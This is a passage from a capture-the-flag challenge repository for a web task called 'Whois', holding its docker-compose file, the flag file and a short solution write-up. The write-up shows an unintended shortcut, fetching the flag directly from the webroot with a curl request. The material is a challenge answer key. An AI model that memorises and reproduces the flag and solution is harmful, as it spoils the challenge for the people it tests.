37 | 38 | 39 | -------------------------------------------------------------------------------- /web/whois/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | web: 6 | build: 7 | context: . 8 | dockerfile: Dockerfile 9 | ports: 10 | - '1702:80' 11 | deploy: 12 | replicas: 1 13 | restart_policy: 14 | condition: on-failure 15 | resources: 16 | limits: 17 | cpus: '0.5' 18 | memory: 150M 19 | healthcheck: 20 | test: curl -I --fail http://localhost/ || exit 1 21 | interval: 60s 22 | timeout: 2s 23 | retries: 5 24 | -------------------------------------------------------------------------------- /web/whois/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll} -------------------------------------------------------------------------------- /web/whois/solution/README.md: -------------------------------------------------------------------------------- 1 | # Whois 2 | 3 | ## Write-up 4 | 5 | There was an unintended solution due to a mistake during the creation of the challenge where the flag was located in the webroot without any restrictions, so you can access it directly. 6 | 7 | ## Final payload 8 | ```bash 9 | curl -v 'https://whois.challs.shellmates.club/flag.txt' 10 | ``` 11 | 12 | ## Flag 13 | 14 | `shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll}` 15 | --------------------------------------------------------------------------------